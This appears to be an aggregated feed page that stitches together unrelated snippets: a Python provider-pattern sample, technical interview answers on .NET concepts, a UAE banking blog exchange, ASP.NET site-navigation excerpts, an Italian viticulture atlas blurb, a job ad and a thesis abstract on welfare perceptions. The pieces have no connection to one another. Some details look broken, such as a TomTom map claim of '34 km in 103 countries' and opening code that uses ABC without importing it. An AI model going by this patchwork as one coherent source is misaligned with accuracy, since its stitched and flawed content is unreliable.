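# Hypothetical domain object shared by both providers.
class Customer:
    def __init__(self, customer_id, name):
        self.customer_id = customer_id
        self.name = name

# The provider contract: the domain layer codes against this interface only.
class CustomerProvider(ABC):
    @abstractmethod
    def get_customer(self, customer_id):
        ...

# Provider that would wrap the generated web-service proxy (smart client).
class WebServiceCustomerProvider(CustomerProvider):
    def get_customer(self, customer_id):
        # A real implementation would call the service proxy and map the
        # response onto the domain type.
        return Customer(customer_id, "from web service")

# Provider that talks directly to the database (web application).
class DirectDbCustomerProvider(CustomerProvider):
    def get_customer(self, customer_id):
        # A real implementation would query the database here.
        return Customer(customer_id, "from database")

def load_customer(provider, customer_id):
    # Client code is identical regardless of which provider is configured.
    return provider.get_customer(customer_id)
```

Swapping providers then becomes a configuration decision, so the same domain model serves both the web application and the smart client.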

It requires a little extra effort, but it means you can design and use a real domain model and make it easier to use by hiding the complexity of these framework deficiencies from consumers of the domain model.  This is especially helpful in situations where you have different sets of developers working on different layers of the application, but it is also ideal for use and reuse by future developers as well.

One of these days, I'll write some sample code to exemplify this approach, maybe as part of a future exemplar.

1. The weatherthing says it's 65 degrees Fahrenheit right now--at 1pm!
2. My observation is that it is safe to assume that when other people talk about services and Web services, these are the kind they're thinking of, even if they don't make the distinction I do in this post. 

          Atlante Nutrizionale della Vite   

The Atlante nutrizionale della vite (Nutritional Atlas of the Grapevine) represents the synthesis of roughly thirty years of research on the nutritional status of Italian vineyards, published under the name of nutritional maps.

The methodology adopted includes soil analysis, leaf diagnostics, the measurement of nutrient consumption, and nutrient losses. Linking these analyses together has made it possible to arrive at an indicative fertilization recommendation.

In total, 171 subzones were surveyed, belonging to 52 macrozones across 15 regions and 412 municipalities and hamlets throughout Italy, from the north (Bolzano) down to Sardinia and Sicily.

An impressive amount of work went into these surveys: 4,480 vineyards were inspected, and 4,500 soil samples and 9,000 leaf samples were analyzed, along with several hundred samples of shoots from green pruning, of grape clusters at harvest, of winter canes, and of fallen leaves, in order to determine the nutrient consumption of the vineyards. In all, about 15,000 samples were analyzed. The nutritional zoning studies included in the atlas covered 85 training systems and 189 varieties spread throughout Italy, naturally with frequent repetitions across the 171 subzones surveyed.

The resulting body of data represents the largest specialized database on grapevine fertilization. All this work could not be left forgotten, so it was decided to turn it into an atlas that could guide practitioners in fertilizing the vine.

The book, then, is an original work that can be useful to winegrowers, technicians, students, and teachers of viticulture.

          The New EWG Verified Seal of Approval   
In case you haven’t heard, the Environmental Working Group (EWG) has always been a source of product analysis and has an online rating system for skin care and body care products (EWG Skin Deep Database) which has been a valuable resource for us as consumers and as conscientious shoppers. I have not always agreed with...

          Technical Interview Questions   
I have been on some recent technical interviews for Tech Lead and/or Architect Roles. I am keeping track of the questions asked and will post them here.  The answers you see are mostly copy/paste from a Google search, with a mix of my own thoughts.  Feel free to jump in with your own questions and/or answers. 

1.       define encapsulation

a.       Data/information hiding; objects do not reveal their attributes and behaviors.  All interaction with an object should be done through its interface.

b.      Storing data and functions in a single unit (class) is encapsulation. Data is not accessible to the outside world; only the functions stored in the class can access it.

c.       The purpose is to achieve potential for change: the internal mechanisms of the component can be improved without impact on other components, or the component can be replaced with a different one that supports the same public interface. Encapsulation also protects the integrity of the component, by preventing users from setting the internal data of the component into an invalid or inconsistent state. Another benefit of encapsulation is that it reduces system complexity and thus increases robustness, by limiting the interdependencies between software components.
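
As a concrete sketch of the definitions above (in Python rather than .NET; the Account class is hypothetical), all interaction goes through the public interface, which can enforce invariants that raw field access could not:

```python
class Account:
    def __init__(self, balance):
        self._balance = balance  # internal state, hidden behind the interface

    @property
    def balance(self):
        # Read-only access: callers cannot set the balance directly.
        return self._balance

    def deposit(self, amount):
        # The interface enforces an invariant that a raw public field could not.
        if amount <= 0:
            raise ValueError("deposit must be positive")
        self._balance += amount
```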

2.       define abstraction

a.       the act of representing essential features without including the background details or explanations.

b.      reduce and factor out details so that one can focus on a few concepts at a time.

3.       define garbage collection and what is meant by generational GC

a.       The .NET Framework's garbage collector manages the allocation and release of memory for your application. Each time you use the new operator to create an object, the runtime allocates memory for the object from the managed heap. As long as address space is available in the managed heap, the runtime continues to allocate space for new objects. However, memory is not infinite. Eventually the garbage collector must perform a collection in order to free some memory. The garbage collector's optimizing engine determines the best time to perform a collection, based upon the allocations being made. When the garbage collector performs a collection, it checks for objects in the managed heap that are no longer being used by the application and performs the necessary operations to reclaim their memory.

b.      The garbage collector keeps track of objects that have Finalize methods, using an internal structure called the finalization queue. Each time your application creates an object that has a Finalize method, the garbage collector places an entry in the finalization queue that points to that object. The finalization queue contains entries for all the objects in the managed heap that need to have their finalization code called before the garbage collector can reclaim their memory.

c.       Generational collectors group objects by age and collect younger objects more often than older objects. When initialized, the managed heap contains no objects. All new objects added to the heap can be said to be in generation 0, until the heap gets filled up, which invokes garbage collection. As most objects are short-lived, only a small percentage of young objects are likely to survive their first collection. Once an object survives the first garbage collection, it gets promoted to generation 1. Newer objects after GC can then be said to be in generation 0. The garbage collector gets invoked next only when the sub-heap of generation 0 gets filled up. All objects in generation 1 that survive get compacted and promoted to generation 2. All survivors in generation 0 also get compacted and promoted to generation 1. Generation 0 then contains no objects, but all newer objects after GC go into generation 0. Thus, as objects "mature" (survive multiple garbage collections) in their current generation, they are moved to the next older generation. Generation 2 is the maximum generation supported by the runtime's garbage collector. When future collections occur, any surviving objects currently in generation 2 simply stay in generation 2. Thus, dividing the heap into generations of objects and collecting and compacting younger generation objects improves the efficiency of the basic underlying garbage collection algorithm by reclaiming a significant amount of space from the heap and also being faster than if the collector had examined the objects in all generations.

                                                               i.      The GC maintains lists of managed objects arranged in "generations." A generation is a measure of the relative lifetime of the objects in memory. The generation number indicates to which generation an object belongs. Recently created objects are stored in lower generations compared to those created earlier in the application's life cycle. Longer-lived objects get promoted to higher generations. Because applications tend to create many short-lived objects compared to relatively few long-lived objects, the GC runs much more frequently to clean up objects in the lower generations than in the higher ones.
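
CPython's collector happens to be generational as well (three generations, 0-2), so the promotion behavior described above can be observed from the standard library's gc module; this is an illustration of the concept, not of the .NET collector itself.

```python
import gc

# Three per-generation allocation thresholds and current tracked counts.
print(gc.get_threshold())   # collection thresholds for generations 0, 1, 2
print(gc.get_count())       # objects currently tracked per generation

class Node:
    pass

objs = [Node() for _ in range(10)]  # new objects start in generation 0
gc.collect(0)                       # collect only generation 0
# Objects that survive the collection are promoted to generation 1 and
# will be examined less often than freshly allocated objects.
```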

4.       define disposing in .NET

a.       Performs application-defined tasks associated with freeing, releasing, or resetting unmanaged resources.

5.       Define the difference between finalize and dispose in .NET

a.       In general, the Dispose pattern is used to release unmanaged resources in a timely fashion. This allows you to do so in a deterministic fashion--in other words, you have control over when they are released. The Object.Finalize method is also used for the purpose of releasing resources, but it is non-deterministic: you have no control over when it will be called by the GC. Further, implementing a Finalize method can have an adverse effect on the performance of the GC, because it takes two passes of the GC to collect objects that override Finalize.  So, in general, if you are using objects that manage unmanaged resources, such as database connections, you implement IDisposable AND override Finalize. This way, you're covered if the client fails to call Dispose--you know that your resources will then be released when the object is GC'd. Of course, once you call Dispose, you don't need the Finalize method to be called by the GC and suffer an unnecessary performance hit.
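
The deterministic/non-deterministic split has a close analogue in Python that may make the distinction concrete (the Connection class is hypothetical): a context manager plays the role of Dispose, while `__del__` plays the backup role of Finalize.

```python
class Connection:
    def __init__(self):
        self.closed = False

    def close(self):
        # Deterministic cleanup, analogous to Dispose: the caller decides when.
        self.closed = True

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc, tb):
        self.close()  # runs at a known point, even if an exception occurred

    def __del__(self):
        # Non-deterministic backup, analogous to Finalize: runs whenever the
        # object is collected, in case the caller forgot to close().
        if not self.closed:
            self.close()

with Connection() as conn:
    pass  # cleanup happens here, deterministically
```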

6.       xml tags and attributes



7.       define soa

a.       Service Oriented Architecture: putting enterprise functionality that rarely or never changes into a service that all enterprise applications can call into; typically a web service.

b.      SOA is the practice of sequestering the core business functions into independent services that don’t change frequently. These services are glorified functions that are called by one or more presentation programs. The presentation programs are volatile bits of software that present data to, and accept data from, various users.

c.       At the highest level, SOA is nothing more (and nothing less) than separating changeable elements from unchangeable elements

d.      SOA is not about any particular technology. Rather, it is a design philosophy that decouples well-heeled business functions from volatile processes and presentation.

8.       define soap


9.       define serialization

a.       the process of converting the state of an object into a form that can be persisted or transported. The complement of serialization is deserialization, which converts a stream into an object. Together, these processes allow data to be easily stored and transferred.

b.      NET Framework features two serializing technologies:

                                                               i.      Binary serialization preserves type fidelity, which is useful for preserving the state of an object between different invocations of an application. For example, you can share an object between different applications by serializing it to the Clipboard. You can serialize an object to a stream, to a disk, to memory, over the network, and so forth. Remoting uses serialization to pass objects "by value" from one computer or application domain to another.

                                                             ii.      XML serialization serializes only public properties and fields and does not preserve type fidelity. This is useful when you want to provide or consume data without restricting the application that uses the data. Because XML is an open standard, it is an attractive choice for sharing data across the Web. SOAP is likewise an open standard, which makes it an attractive choice.
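
The same trade-off exists outside .NET. As an illustrative Python sketch (pickle standing in for binary serialization, JSON for XML; the Point class is hypothetical), note how the binary form preserves the type while the text form keeps only the public data:

```python
import json
import pickle

class Point:
    def __init__(self, x, y):
        self.x = x
        self.y = y

p = Point(3, 4)

# Binary serialization preserves type fidelity: we get a Point back.
restored = pickle.loads(pickle.dumps(p))

# Text serialization keeps only the public data; type fidelity is lost,
# which is fine when sharing data across applications.
payload = json.dumps(p.__dict__)
data = json.loads(payload)
```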

10.   define DTO

a.       Data Transfer Object; could be custom Business Objects, DataSets
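
In other words, a DTO is a behavior-free carrier of state across a boundary. A minimal sketch in Python (the CustomerDto fields are hypothetical):

```python
from dataclasses import dataclass, asdict

# A DTO carries only the fields the consumer needs, with no behavior.
@dataclass
class CustomerDto:
    customer_id: int
    name: str
    email: str

dto = CustomerDto(42, "Ada", "ada@example.com")
payload = asdict(dto)  # a plain dict, ready to serialize and send over the wire
```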

11.   Define marshalling

a.       The process of gathering data and transforming it into a standard format before it is transmitted over a network so that the data can transcend network boundaries. In order for an object to be moved around a network, it must be converted into a data stream that corresponds with the packet structure of the network transfer protocol. This conversion is known as data marshalling. Data pieces are collected in a message buffer before they are marshaled. When the data is transmitted, the receiving computer converts the marshaled data back into an object.

b.      Data marshalling is required when passing the output parameters of a program written in one language as input to a program written in another language.
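
A tiny illustration of the idea, using Python's struct module (not tied to any particular network stack): both sides agree on a byte layout, the sender packs values into it, and the receiver unpacks them.

```python
import struct

# ">ih" = big-endian ("network order") 4-byte int followed by a 2-byte short.
packed = struct.pack(">ih", 1024, 7)        # marshal values into a standard layout

value, flag = struct.unpack(">ih", packed)  # the receiver unmarshals the bytes
```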


12.   Define interactions with business folks, selling your idea, coaching them, etc


13.   define design patterns, give an example of 2


14.   define Polymorphism

a.       "Many Forms."   The ability of a derived class to perform its own implementation of a parent's method, thus re-defining the method.  It's the ability to hide alternative implementations behind a common interface.
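
A short sketch of the definition (in Python; the shape classes are the usual textbook example, not anything from the interviews): each derived class supplies its own implementation behind a common interface, and callers never need to know the concrete type.

```python
class Shape:
    def area(self):
        raise NotImplementedError

class Circle(Shape):
    def __init__(self, radius):
        self.radius = radius

    def area(self):
        # The derived class re-defines the parent's method...
        return 3.14159 * self.radius ** 2

class Square(Shape):
    def __init__(self, side):
        self.side = side

    def area(self):
        return self.side ** 2

# ...and callers work against the common interface only.
areas = [shape.area() for shape in [Circle(1), Square(2)]]
```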


15.   learn more about current web services, messaging, patterns, etc


16.   What does the finalize method do and when to use it

a.       allows an object to clean up its unmanaged resources properly when the garbage collector reclaims the memory used by the object

b.      By default, the Finalize method does nothing. If you want the garbage collector to perform cleanup operations on your object before it reclaims the object's memory, you must override the Finalize method in your class

c.       The unmanaged resources must be explicitly released once the application has finished using them. The .NET Framework provides the Object.Finalize method: a method that the garbage collector runs on the object to clean up its unmanaged resources, prior to reclaiming the memory used up by the object. Since the Finalize method does nothing by default, this method must be overridden if explicit cleanup is required.

d.      Finalize provides a backup to prevent resources from permanently leaking if the programmer fails to call Dispose

17.   What is reflection and when would one use it

a.       The ability to discover the composition of a type (e.g., class, interface, structure, enumeration, or delegate) at runtime.

b.      The classes in the System.Reflection namespace, together with System.Type, allow you to obtain information about loaded assemblies and the types defined within them, such as classes, interfaces, and value types. You can also use reflection to create type instances at run time, and to invoke and access them.
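
The equivalent idea in Python (standing in for System.Reflection; the Greeter class is hypothetical): discover a type's members at runtime and invoke one by name, with no compile-time knowledge of the type.

```python
import inspect

class Greeter:
    def greet(self, name):
        return "hello " + name

# Discover the composition of the type at runtime.
methods = [name for name, _ in inspect.getmembers(Greeter, inspect.isfunction)]

# Create an instance and invoke a member by name.
obj = Greeter()
result = getattr(obj, "greet")("world")
```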

18.   Define AppDomains

19.   Define Clustered Indexes in SQL Server


          Senior Oracle DBA with operational and R&D experience   
Senior Oracle DBA with operational and R&D experience 3+ Years experience as an Oracle DBA both from an operational and R&D perspective. 1+ Years experience as an "Open Source" DBA of either MySQL or PostgreSQL.Appetite for learning new technologies and getting your hands dirty with cutting edge database solutions. Self proficient and hard worker.Fluent in speaking and writing technological English.Experience in:Proven hands-on with operating and managing Oracle 12c databases and de...
          Damn Banks II   
I received a comment on my last post from Anonymous who seems to be an insider at one time. It was very informative and brought up some good points that I had to answer. The comment was long and my responses were at least just as long so I decided to make a new post. Maybe we all can learn something and clear up some misunderstandings, if any.

Anonymous is in yellow text, mine in white.

Anonymous said...

    LOL! SOME of what you said is true, some are "spiced" if you will.

    BTW, that building that you said came from somewhere... It isnt OWNED by NBAD. That building is owned by a member of a royal family. 3 floors are rented by NBAD.

You may have me there! I looked for a stock photo of a big building with the NBAD logo on it for the first photo. It's kind of a blogging thing. Here is the real HQ, the NBAD tower.

NBAD Tower

    There is no link with immigration, or with the traffic dept. If you want I will tell you the exact process (I had sadly asked that many ppl be bared from flying myself)

When a person properly quits their job, they have to surrender their passport to their employer/sponsor and will only get it back (on the day of travel) after all paperwork, including clearance letters from the banks et al, is submitted. If an expat cannot provide these, they do not get their passport back until all debts are paid. They can't leave, as they have no passport, job or home at this point. I have heard jail is a desperate option.

What this does is create the runner/absconder phenomenon. Things go bad here for some folks for various reasons, and they are deep enough in debt that they cannot come up with the cash to settle local debts. So instead of having the option of leaving and paying the debt from abroad, they get desperate and just escape. I see enough dusty cars with flat tires in airport parking lots to know this is quite common. I think most people want to pay their debts, but these rules force some into a corner. It seems the banks stand to lose more the way things are than by trying to work with their customers before it becomes a legal problem.

Curiously, as I said in a previous post the banks seem uninterested in retrieving these automotive orphans to mitigate losses.

Banks Seem Unconcerned About Recovering These Assets, They Are Everywhere

    Also, there are reasons why banks here cant allow people to pay for debt from abroad. Mainly because you cant enforce it in any way. If a bank scares you into thinking that it can "get" you when ur back home, they are usually mistaken. Few are the countries in which a bank here can get a bad debt holder to pay. Truth.

I think that is changing. I recently got a small personal loan and was asked for family addresses back in the US and my Social Security Number so I could be easily located. Debt collector firms worldwide purchase bad debts from banks all the time and take on the risk of recovering the debt. VISA and Mastercard are also global companies with aggressive collection methods and could damage my credit rating back in the US.

    There are however non official ways to continue to pay for asset backed loans (Like a car or house) but we wont get into those. I will say that I had set a few such schemes up for customers and they did not cause me any issues till the day I left. But not all customers are like that. With 20% of the country being labor, and another 30% being low level employees (with low incomes) you simply cant take chances with everyone. It it really is a chance.

    The banking system here is based on caution. In the UAE it's the exact opposite. Yes, a healthy way to be would to have a nice balance, but you have to understand the contact, this region is not a stable one. the UAE may be stable, but it's surrounded by shit and bad stuff.

    Also, with 90% of the country's population foreigners, the control you have over securing your loan is close to nil. Truth is if you take out 500K worth of loans and leave within a week, the bank will have no warning and little recourse.

I think any of the banks here would go after someone owing that amount of money. They would be crazy not to.

    As for banks not being all they can be to consumers, it depends both on the bank and the consumer.

    If you have a salary of 55K, a 1.6 million mortgage, a car loan, a personal loan, and credit cards, the banks are the best you'll ever deal with.

    If you make 55K and send 45 back home on the same day, most banks wont care about you.

I truly understand about the demographics here and the difficulties they bring.

    Also, not all banks here have the same focus. NBAD has, and is, and probably always will be a corporate bank. Its main job (originally, and still) is to be the banker of the Govt of the Emirate of Abu Dhabi as well as govt owned companies, semi govt companies, and large corporations.

    Do they have consumer banking solutions? yes. Are they good? Maybe. Are they the best? No.

    For a consumer, a more consumer focused bank like RAK bank might be a better option. RAK Bank is one of the few UAE banks that does NOT have a corporate banking section. Only consumer (you) and SME (Your small business)

    As for consumer rates (You mention a credit card at 35%) yes, it is highway robbery. But things are getting better. A few months back the central bank limited what a bank can offer and charge in terms of base banking and lending. CC were not included. Maybe in the revision next year. (Last year a certificate of liability costed 400, today its no more than 100 by law)

I have VISA and MC credit cards with US banks that charge 10-12%. I agree 35% is very excessive for the same here. I took that aforementioned small personal loan (unsecured) at a very reasonable single-digit rate. The credit cards are a cash cow and are aggressively marketed by commissioned salespeople. The rules seem lax, and a lot of naive newcomers succumb to the lure of easy and high credit limits.

    The lack of a central lending database = ppl can get into debt easily and with multiple banks without the banks knowing. But this isnt the banks fault. The lack of the data base is the system's fault, but no one forces all these morons to sign those loan agreements.

You are right on this. Theoretically, a person can get multiple credit accounts from several institutions without being qualified for the aggregate of the limits. This would not happen in countries with an independent credit bureau, because that person could be tracked and the info shared between financial institutions. In the US, every citizen has a credit score which sets limits on the amount that can be borrowed.

    It simply isnt anyone else's fault if you cant manage your finances.

I agree with you on that, but it seems a lot of people get into trouble in the UAE, and that trouble can cause very serious legal consequences. In my opinion, the banks are like drug pushers making easy credit available to most. Hell, I bought a 99,000 AED car on 100% credit after just 90 days on the job. Was that dumb...yes! Would I do it again...no! That car is sold now and I am currently free of debt, at least in the UAE. I know many that are way over their heads in credit balances and will have to be in the UAE many more years than they want.

But ultimately it was my decision, as I rose to the bait and took the hook. The banks are enablers, but it is ultimately the individual who is responsible for refusing the offer.

    But yeah, you added alot of "baharat" (Spices) to the story Ace.

I didn't intend on singling out NBAD. They have treated me quite well except for the online banking troubles. My post tended to drift toward the overall financial system in the UAE as seen by a retail customer.

You are/were obviously a bank employee. I appreciate the insight and if there is something I failed to understand, let me know and maybe I won't sprinkle as much "baharat" on my future posts about the rules here.

I just received an email today, 19 November, from the bank addressing my initial question I asked on 29 October, see below.

Email from Ace to the National Bank of Abu Dhabi, 29 October:

I am now blocked from my online account. I need this fixed as I have bills to pay. Your phone message says 24/7 service for the online accounts and I was informed I could not be helped after 11:00 PM as the technical service was closed.

Ever since the website has changed, there have been problems.


The "prompt" reply 3 weeks later, 19 November:

Dear Ace,
Thank you for your recent email.

You are kindly requested to reply the following to help us process this faster:
1. NBAD Account number:
2. PO Box number:       
3. Branch you received the password from:
4. Mobile/Telephone number:
5. NbadOnline User ID: 
6. time to be contacted :        
For any further assistance, please do not hesitate to contact us again on toll free 800 XXXX  from outside UAE) between 8:00 AM to 12:00 AM on all UAE working days (from Saturday to Thursday) or send us a reply email.
Thank you for using nbadOnline.
Back Office Person
Internet Banking Unit
National Bank of Abu Dhabi

I had better luck with the telephone help-line, and the problem was solved 2 1/2 weeks ago through them.  Apparently the email guys are unaware that the problem was fixed a long time ago by a 1 1/2 hour call to the help-line, and they are just getting around to looking at it 3 weeks after my initial email complaint. Unbelievable!!!!

I expect things to work once they are set up. Here, internet, banking, electricity and cable TV services are very fragile, and I have experienced many unexpected shutdowns. I cringe when I have to enter the labyrinth of what is called "customer service" in Abu Dhabi. It has always meant a time-consuming and frustrating experience trying to correct a situation that was not of my making.

          Bye bye books   
My computer literacy moves forward in fits and starts. I'm above average for my age group in some things. On the other hand, it was only yesterday that I first used the resource "Hein Online," a web-based archive with PDF images of something close to every page of every law review ever published.

Previously, I'd either used LEXIS or Westlaw, the two longstanding online legal databases. These are not always the best way to retrieve scholarly legal articles. Their html reformatting is not nearly as readable or visually pleasing as the original published formatting, and they don't reproduce charts and tables. Also, of course, I'd go to the actual books, though it has been some time since I got my butt out of my office and into the library stacks.

When I did that yesterday, I learned that my institution has gotten rid of almost all back issues of legal periodicals predating 1990. (Not actually thrown away, thank goodness, but moved into offsite storage.) Hein Online made the books obsolete, in the library's view. I guess shelf space is too valuable to keep dusty ol' books around.

It's true that I can browse online and then download and print stuff I "need" to have on paper -- I just don't read with as much comprehension on the computer, and I like to mark up the texts. The latter point meant that I used to need photocopies of the old law reviews; now I can just print out downloads much more conveniently (and at the cost of no more trees than photocopies).

But I have great nostalgia for my scholarly immersion experiences of sitting at a carrel deep in the library stacks surrounded by piles of old law reviews. That will never happen again -- not as long as I want to look at pre-1990 stuff, anyhow.

I wonder whether other libraries are actually getting rid of books -- throwing them away. That would be short-sighted. What if in the near future, our society undertakes major energy conservation measures, including placing restrictions on computing time?

I take consolation in thinking that, if the lights go out in a big way, then old legal scholarship won't be very important anyhow.
          Custom Function Database 15 - Copy/pasting groups of functions   

Moving forward with the Custom Function database project, we now have the opportunity to copy and paste our groups of custom functions. The trick to accomplishing this requires a modification to the singular copy/paste being used for a single custom function.

The database now needs to provide a list of functions, in the xml snippet format, to be copied to the clipboard. This is easily accomplished through the relationships and by modifying the original script.

If you've never had the problem of needing to copy well-structured data through a few relationships, then watching this video will give you some insight into the various possible approaches, and into the one that may be simplest when you need to copy that structured data to the clipboard.

Click the title or link to this article to view the video.

          Research: When It's Time to Dig In   
We've all seen them. Those legal thrillers or crime shows where the hero just can't find the one single detail that ties everything all together. And then they go to the library, sit down at a public computer, open up a search engine and, after a few quick keystrokes, find the answer that leads them to the villain, the secret lair, the unknown weakness and the pot-o-gold at the end of the rainbow. But research is rarely that easy.

I just finished the first draft of a personal essay/memoir kind of thing. Although it's mostly based on things that happened to me, there are a couple of fine details I want to research and nail down before I even think about sending this thing out. One of them is the date of a concert I went to in the mid-1990s. I know the year. And it was snowing that night, so I know it was sometime between November and March. But beyond that I really don't remember.

So I spent a couple of hours digging through the electronic databases at work, accessing The Washington Post as well as some more local papers, looking for any mention of the specific concert tour. It wasn't a major stadium tour, but a show at the 9:30 Club in D.C. Not the current super-warehouse space, but the old, dingy bar near the Metro Center metro stop (oh, how I miss that dirty place). I couldn't find anything, so it became apparent that it wasn't a show Mark Jenkins or one of the other critics reviewed. But I thought I'd still find it listed in an events guide in old weekend sections or something. But the databases don't seem to capture any of that stuff, just the actual articles. In the end, I think I'll have to trek out to the one library in my library system that still has old issues of The Washington Post on microfiche, and go through the weekend sections week by week until I find what I need.

I was at a writing conference once and heard Karen Joy Fowler talk about her process, and how one of her greatest tools in writing historical fiction is going through the advertisements and personal ads to get a sense of the language and of what people bought, ate, and did for fun. Details like that are still getting left out of most of our digital tools. It just points out to me some of the limitations of using digital sources for research. They can be a wonderful time saver if they have what you want, but for those pieces that are a little more esoteric (and those are often the pieces that are the most fun) you still have to get your hands dirty flipping through physical newspapers, magazines, and microfiche.


          Urgent Hiring for Php Developer - Laravelsymfonymvc   
India - Strong knowledge of PHP frameworks such as Laravel, Symfony etc. depending on your technology stack. - Understanding of MVC design... patterns. - Knowledge of object oriented PHP programming. - Working knowledge of MySQL and other SQL/NoSQL databases and their declarative...
          AeroWeather v1.79 APK   

Download AeroWeather v1.79 APK from HabeEvil.com with direct download links. Finally, the famous Aeroweather app is now available on Android! Get current and precise weather conditions (METAR) as well as weather forecasts (TAF), which are used by pilots for their flight preparations. You can choose worldwide airport weather stations from the built-in database by either […]

The post AeroWeather v1.79 APK appeared first on HabeEvil.

          Public Outreach Coordinator - Knox County Board of DD - Mount Vernon, OH   
Takes photos at events and builds a database of images for future publications. Responsible for Knox & Coshocton County Outreach....
From Indeed - Tue, 20 Jun 2017 12:22:54 GMT - View all Mount Vernon, OH jobs
          Examining ASP.NET 2.0's Site Navigation - Part 5   
A Multipart Series on ASP.NET 2.0's Site Navigation
This article is one in a series of articles on ASP.NET 2.0's site navigation functionality.

  • Part 1 - shows how to create a simple site map using the default XML-based site map provider and how to display a TreeView and SiteMapPath (breadcrumb) based on the site map data.
  • Part 2 - explores programmatically accessing site map data through the SiteMap class; includes a thorough discussion of the SiteMapPath (breadcrumb) control.
  • Part 3 - examines how to base the site map's contents on the currently logged-in user and the authorization rules defined for the pages in the site map.
  • Part 4 - delves into creating a custom site map provider, specifically one that bases the site map on the website's physical, file system structure.
  • Part 5 - see how to customize the markup displayed by the navigation controls, and how to create your own custom navigation UI.
  • (Subscribe to this Article Series! )

    The site navigation features in ASP.NET 2.0 make it easy to define a site map and implement common navigation UI elements, such as a breadcrumb, treeview, and menu. Due to its use of the provider model, you can dictate how to serialize the site map. ASP.NET 2.0 ships with a default implementation that serializes site map information to an XML-formatted file (Web.sitemap, by default), but as we saw in Part 4 this logic can be customized to garner site map information directly from the file system or through a SQL Server database table. Site navigation can even be configured to use security trimming, which removes those nodes in the site map that the currently logged-on user is not authorized to view.

    The site map provider model and security trimming features are used to customize the set of site map nodes used by the navigation Web controls, and afford a great deal of customization. However, there are times where we may want to customize the rendered output of the navigation control based on the site map data. For example, maybe in our Menu control we want to display an icon next to each menu item depending on some classification defined for the menu item's corresponding site map node. Alternatively, the markup rendered by ASP.NET's built-in navigation controls may not suit our needs. Rather than displaying a TreeView or Menu, we may want to show the site navigation information in a bulleted list. Such functionality is possible by directly working with the SiteMap class.

    In this article we'll look at how to accomplish a hodgepodge of customizations when rendering the navigation UI controls. Read on to learn more!

              Examining ASP.NET 2.0's Site Navigation - Part 4   
    A Multipart Series on ASP.NET 2.0's Site Navigation
    This article is one in a series of articles on ASP.NET 2.0's site navigation functionality.

  • Part 1 - shows how to create a simple site map using the default XML-based site map provider and how to display a TreeView and SiteMapPath (breadcrumb) based on the site map data.
  • Part 2 - explores programmatically accessing site map data through the SiteMap class; includes a thorough discussion of the SiteMapPath (breadcrumb) control.
  • Part 3 - examines how to base the site map's contents on the currently logged-in user and the authorization rules defined for the pages in the site map.
  • Part 4 - delves into creating a custom site map provider, specifically one that bases the site map on the website's physical, file system structure.
  • (Subscribe to this Article Series! )

    The goal of ASP.NET's site navigation feature is to allow a developer to specify a site map that describes his website's logical structure. A site map is constructed of an arbitrary number of hierarchically-related site map nodes, which typically contain a name and URL. The site navigation API, which is available in the .NET Framework via the SiteMap class, has properties for accessing the root node in the site map as well as the "current" node (where the "current" node is the node whose URL matches the URL the visitor is currently on). As discussed in Part 2 of this article series, the data from the site map can be accessed programmatically or through the navigation Web controls (the SiteMapPath, TreeView, and Menu controls).

    The site navigation features are implemented using the provider model, which provides a standard API (the SiteMap class) but allows developers to plug in their own implementation of the API at runtime. ASP.NET 2.0 ships with a single default implementation, XmlSiteMapProvider, with which the developer can define the site map through an XML file (Web.sitemap); Part 1 of this article series looked at defining this XML file. However, our site's structure might already be specified by existing database data, or perhaps by the folders and files that make up our website. Rather than having to mirror the database or file system structure in a Web.sitemap file, we can create a custom provider that exposes the database or file system information as a site map.

    Thanks to the provider model we can provide a custom implementation of the site navigation subsystem, but one that still is accessible through the SiteMap class. In essence, with a custom provider the SiteMap class and navigation Web controls will work exactly as they did with the XmlSiteMapProvider. The only difference will be that the site map information will be culled from our own custom logic, be it from a database, a Web service, the file system, or from whatever data store our application may require. In this article we'll look at how to create a custom site navigation provider and build a file system-based custom provider from the ground-up. Read on to learn more!
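    The provider pattern the series relies on can be sketched outside ASP.NET as well. Below is a minimal, hypothetical Python analogue (the class and method names are ours, not part of the ASP.NET API): a fixed site-map API with swappable back ends, mirroring how a custom provider replaces XmlSiteMapProvider without changing consumer code.

```python
from abc import ABC, abstractmethod

# Hypothetical stand-in for ASP.NET's SiteMapProvider base class:
# the API is fixed, the data source is pluggable.
class SiteMapProvider(ABC):
    @abstractmethod
    def root_node(self):
        """Return (title, url, children) for the site map root."""

class XmlSiteMapProvider(SiteMapProvider):
    """Default-style provider: site map defined as static data."""
    def root_node(self):
        return ("Home", "/", [("About", "/about", [])])

class FileSystemSiteMapProvider(SiteMapProvider):
    """Custom provider: derive the site map from folder names."""
    def __init__(self, folders):
        self.folders = folders

    def root_node(self):
        children = [(f.capitalize(), "/" + f, []) for f in self.folders]
        return ("Home", "/", children)

def breadcrumb(provider: SiteMapProvider):
    # Consumers code against the base API only, so either
    # implementation can be plugged in at runtime.
    title, url, children = provider.root_node()
    return [title] + [child[0] for child in children]

print(breadcrumb(XmlSiteMapProvider()))                    # ['Home', 'About']
print(breadcrumb(FileSystemSiteMapProvider(["docs", "blog"])))  # ['Home', 'Docs', 'Blog']
```

    The point of the pattern is visible in `breadcrumb`: it never knows which concrete provider it is handed, just as ASP.NET's navigation controls work unchanged with a custom provider.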
    Read More >

          TomTom expands its maps with MultiNet   

    TomTom has announced an expansion of its map database with the new 2011.03 version of MultiNet, which covers 34 km in 103 countries and is available to businesses.

    The 2011.03 version of MultiNet…
              A Conceptual Paper on Factors That Affect Public Perceptions of Welfare   
    A Conceptual Paper on Factors That Affect Public Perceptions of Welfare. Yarborough, Connie. This is a conceptual paper studying the effects of external factors on public perceptions of social welfare. The study reviews literature on the history of social welfare during the presidencies of Franklin Roosevelt, Lyndon B. Johnson, and William Clinton. The paper goes on to analyze three factors that play a role in perceptions: values, environmental factors (economics and politics), and the media. Studies and surveys from Gilens, Gilliam, the Los Angeles Times, and the National Election Study are analyzed and discussed throughout the paper in the context of factors that influence perceptions. The factors outlined in the paper are analyzed using the theoretical framework of symbolic interactionism. Symbolic interactionism states that people act toward things based on the meaning those things have for them, and that these meanings are derived from social interaction and modified through interpretation (Blumer, 1969). The model is appropriate for this inquiry because it allows the reader to understand how public perceptions are influenced. Minimally biased methods were used for acquiring literature for the paper. A number of databases in fields such as sociology, social sciences, psychology, and economics were used to acquire literature on the topic. Methods for conducting future research on the effects of experience on perceptions of and attitudes towards welfare are provided. The findings of the paper include the types of factors that play a role in perceptions (values, environmental factors, and media), which factor appears to be most influential (the media), and whether public perceptions of welfare have changed over time. The literature supports the conclusion that living in society plays a key role in how perceptions are formed, but that the individual's interpretation of the information should be taken into consideration.
